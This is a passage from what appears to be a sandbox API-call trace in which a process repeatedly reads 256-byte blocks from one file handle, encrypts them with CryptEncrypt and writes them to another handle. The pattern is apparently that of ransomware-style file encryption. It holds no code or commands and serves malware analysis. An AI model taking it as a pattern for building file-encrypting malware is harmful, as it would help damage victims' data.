lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.633] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.633] GetLastError () returned 0x0 [0149.633] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.633] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.634] GetLastError () returned 0x0 [0149.634] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.634] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.634] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.635] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.635] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.635] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.635] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.635] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.635] GetLastError () returned 0x0 [0149.635] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.635] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.636] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.636] GetLastError () returned 0x0 [0149.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.636] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.636] GetLastError () returned 0x0 [0149.636] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.636] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.636] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.636] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.637] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.637] GetLastError () returned 0x0 [0149.637] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.637] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.638] GetLastError () returned 0x0 [0149.638] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.638] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.638] CryptEncrypt (in: hKey=0x9ad338, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.639] GetLastError () returned 0x0 [0149.639] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.639] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e0, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e0*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.639] CryptEncrypt (in: 